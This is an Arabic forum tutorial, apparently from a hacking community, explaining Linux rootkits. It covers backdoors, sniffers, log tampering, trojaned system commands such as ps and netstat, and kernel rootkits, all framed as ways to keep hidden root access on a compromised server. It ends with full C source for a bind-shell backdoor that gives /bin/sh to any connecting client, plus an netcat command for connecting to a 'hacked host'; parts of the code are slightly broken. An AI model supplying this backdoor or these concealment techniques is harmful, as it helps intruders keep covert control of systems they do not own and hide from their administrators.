[marq]باسم الله الرحمان الرحيم[/marq]
بمناسبة أول موضوع لي بالمنتدى أريد شكر الادارة وأعد الجميع أمه سوف ترون مني كل الابداع امشاء الله
موضوع اليوم سيتناولROOTKIT
القسم الأول:
1- المقدمة.
2- ماهو الرووت كيت RootKit ؟
3- مكونات الرووت كيت RootKit
4- الهاكرز او السكربت كيدز Script Kidz ؟
5- من الذي يستخدم الرووت كيت ؟؟ ولماذا؟
6- ماهي لغة البرمجة التي تكتب بها الرووت كيت؟
7- أنواع الرووت كيت؟
القسم الثاني:
8- الباكدور Backdoors
9- ادوات التجسس Sniffers.
10- اللوج Logz
11- ادوات اضافية في الرووت كيت.
12- معلومات اضافية عن Kernel RootKit .
----------------------------------------------------------------------
********************
1- المقدمة:
---------------
هلا بيكم يا شباب في درس جديد من دروسي.. والي اسال الله انها تكون نافعة لكم وتعينكم على نصرة الخير ان شاء الله ..
موضوع اليوم من المواضيع التي لم تاخذ حقها في الشروح العربية.. حسب ما شفت.. عشان كدا قلت خليني اكتب درس للشباب عن هذا الموضوع والي هو الرووت كيت RootKit.
طبعا ماراح ندخل في تفاصيل كثيره مثل تاريخ صدوره واول نوع لانه ماراح تفيدنا ، لكن راح اشرح اشياء أهم وان شاء الله الجميع يستفيد.
2- ماهو الرووت كيت RootKit؟
-------------------------------------
نسمع كثيرا عن الرووت كيت وأكيد بعضنا قرأ في مواضيع ولقا كلمة الرووت كيت مكتوبه ولا عرف ايش هيا ولا كلف على نفسه بالبحث عن معناها. واخس شي انك تقرأ في موضوع ولا تعرف
ايش مغزاه...
راح اختصر كلمة RootKit الى RK عشان نسهل العملية.
الرووت كيت"RootKit":
هو عبارة عن برنامج يأتي باشكال مختلفة ووظائف متعددة. يسمح للهاكرز اذا اخترق سيرفر واخذ رووت أن يحافظ له على الرووت وعلى أشياء اخرى..
كلمة Root تعني المسؤول عن النظام في لينكس مثل الـAdministratr الي في الويندوز ، وكلمة Kit تعني مجموعة من الأدوات مجمعة مع بعضها.
طبعا الـRK يجعلك مجهول في السيرفر ويحافظ على بقائك كـRoot وكمان يمكنك من التحكم الكامل في السيرفر بدون ما يعرف صاحب السيرفر...والكثير من الوظائف الي راح نشرحها في الأقسام الجاية ان شاء الله.
ملاحظة: من البديهي انو ماراح تقدر تستعمل الرووت كيت RK الا اذا كنت Root على السيرفر.. زي ماهو موجود في اغلب انواع الـRK.
3- مكونات الرووت كيت RootKit:
----------------------------------------
يتكون الـRK من الأشياء التالية [ راح نشرحها بالتفصيل ان شاء الله]:
1-الباكدور Backdoorz : بأنواعه المختلفة مثل "telnetd" ، "Login Backdor".
2-الـ Sniffers:التجسس على خدمات الشبكة مثل "FTP ، TELNET".
3-ادوات الـLogz : تقوم بالتعديل والمسح في اللوج حتى لا تنكشف.
4-ادوات DDOS : الي يسموها بالعربي " هجوم حجب الخدمة" شبيهه بالـPing في الدوس لكنها اقوى من الي في الويندوز بكثييير.
5-IRC/Bots.
6-السكربتات الخبيثة : زي بعض انواع الأكسبلويتات والسكربتات الي تخرب في النظام.
4- الهاكرز Hackers والسكربت كيد Script kidz ؟؟
---------------------------------------------
السؤال دحين هوا هل الرووت كيت RK اداة للهاكر ام للسكربت كيدز ؟
مممممم ... الـScript kids من اسمهم ما يعرفو شي عندهم أي شي على اللينكس هو كمبايل وبعدين تشغيل وخلاص يعني يقولو انو الـRK اداة سهله ما يحتاج لها وهم ممكن ما يعرفوها واذا عرفوها ماراح يقدرو يتعاملو معاها بعكس الهاكر المتمكن منها وهذا هو الفرق بين الأثنين. طبعا في انواع من الـRK تحتاج معرفة ببعض لغات البرمجة مثل لغة C ، وتحتاج في بعضها انك تعرف بيئة النظام وكيف تتعامل معاه وفي البعض وهو الأصعب الي يتعامل مع الكيرنل... يعني الـScript kids الله يخلف عليهم في اكثر الأحيان تلاقيهم ينزلو شي على السيرفر وما يعرفو يتخدموه ويقومو يحذفو وعلى هذا الحال نزل واحذف ، يجي الأدمن يشوف انو في عمليات حذف كثيره ويكتشف انو واحد اهبل كان يحاول يخترق السيرفر ويطرده بره هو وعفشه ..
5- من يستخدم الذي يستخدم الرووت كيت RK ؟ ولماذا؟
------------------------------------------------------
عرفنا في القسم الي قبل هدا مين الي يستخدمها وقلنا انها تستخدم من قبل كل من الهاكرزHackers و Script kidz..
وزي ما عرفنا كمان انو الرووت الكيت RK تستخدم لاغراض كثيره منها تخليك مسيطر على السيرفر كـR00t وكمان انك تبقى مجهول وتساعدك على التخفي بالإضافة الى الأعمال التخريبية الي ممكن تسويها...
6- ماهي لغة البرمجة التي تكتب بها الرووت كيت RK؟
-----------------------------------------------------
اكثر انواع الـRK مكتوبة بلغة الـC او الأسمبلي للـSHELL CODE.
طبعا ميزة كتابتها بلغة الـC انك تقدر تحرر الكود وتعدل فيه زي ما تبغى وعلى حسب متطلباتك.
7- أنواع الرووت كيت RootKit.
---------------------------------
هناك نوعان من الرووت كيت RK وهي :
1- Application rootkits – الي هو مصمم خصيصا للبرامج. مثل ("ls ، kill ").
2- Kernel rootkits – مصممه للكيرنل والتعامل معه.
ناخذ النوع الأول:
Application rootkits : هذا النوع ممكن نعتبره أسهل من النوع الثاني واقل تعقيدًا منه ، حيث ان وظيفته هي التعديل في برامج السيرفر واللعب والتغير في اكوادها عشان ما تقرأ الأشياء صح وهذا يمنح الشخص الي نزلها تخفي وسرية نوعا ما.
قائمة ببعض البرامج التي يتم التعديل فيها:
::" ls " "find" "du" :- اول مانشوف الأوامر هذي راح نعرف ايش الي راح يصير انها ماراح تعرض المجلدات والملفات الصحيحة بأحجامها والي فيها .
::"top" "ps" "pidof" :- راح تتعدل متعرض معلومات خاطئة طبعا من الأوامر نعرف انو ماراح تشوف البرامج الي شغاله في الخلفية وكمان ماراح تشوف المساحة الي مستخدمة من الـCPU على السيرفر وهذا يشكل خطر على صاحب السيرفر.
::"netstat" :- من المعروف أنو هذا الأمر يقوم بعرض البروتات في الجهاز واللأجهزة الي متصلة بالشبكة والخدمات لكن لمن تنزل الرووت كيت على السيرفر راح تعدل فيها وخلف الله على الأمر المهم جدا. ماراح يعرض البورتات الصحيحة وكمان راح يخفي الباك دورات الي متصلة وبورتاتها .
::"killall":- وظيفة الأمر هذا هو قتل عمليات وايقافها لكن الرووت كيت لمن ينزل راح يجعلها تعمل العكس تماما ويمنعها من تنفيذ مهامها.
::"crontap" :- الخاص بالمجدولة ومهام النظام الدورية.
++++++++
والان نتكلم عن النوع التاني:
Kernel rootkit : هذا النوع صعب و جدا وصعب الأكتشاف ليش؟؟
لانه يدخل في الكيرنل ويتعامل مع الكيرنل...
وراح نتكلم عن هذا النوع بشيء من التفصيل في الأقسام الجاية...
8- الباكدور Backdoor:
-------------------------
اكثر انواع الـRK يكون معها باكدور ويختلف نوعه وقوته حسب الي مسوينه..
ونشطب على هذا القسم بواحد من الباكدورات راح احطه وانتو اكتشوف من أي نوع هذا الباكدور:
--------------من هنا----------------
/* backdoor.c - basic unix tcp backdoor.
*
* This is a basic UNIX TCP backdoor. /bin/sh is binded to the port of your
* choice. Access the shell with telnet or netcat:
*
* root# nc -v hackedhost.com 1337
*
* I do not take responsibility for this code.
*/
#include
#include
#include
#include
#define BACKLOG 5
#define SHELL "/bin/sh"
void usage();
int main(int argc, char *argv[]) {
if(argc <2) {
usage(argv[0]);
}
int sock, csock;
struct sockaddr_in client;
struct sockaddr_in mine;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Couldn't make socket!n"); exit(-1);
}
mine.sin_family = AF_INET;
mine.sin_port = htons(atoi(argv[1]));
mine.sin_addr.s_addr = INADDR_ANY;
if(bind(sock, (struct sockaddr *)&mine, sizeof(struct sockaddr)) == -1) {
printf("Could not bind socket!n");
exit(-1);
}
if(listen(sock, BACKLOG) == -1) {
printf("Could not listen on socket!n");
exit(-1);
}
printf("Listening for connections on port %s!n", argv[1]);
while {
int sin_size;
sin_size = sizeof(struct sockaddr);
csock = accept(sock, (struct sockaddr *)&client, &sin_size);
dup2(csock, 0);
dup2(csock, 1);
dup2(csock, 2);
execl("/bin/sh","/bin/sh",(char *)0);
close(csock);
}
}
void usage(char *progname[]) {
printf("Usage: %s n", progname);
exit(-1);
}
__________________
لاإله إلا الله محمد رسول الله
avp ahlg gg v,,j ;dj
06-20-2010, 05:14 AM
شرح شامل لل رووت كيت 
المواضيع المتشابهه 
العرض العادي
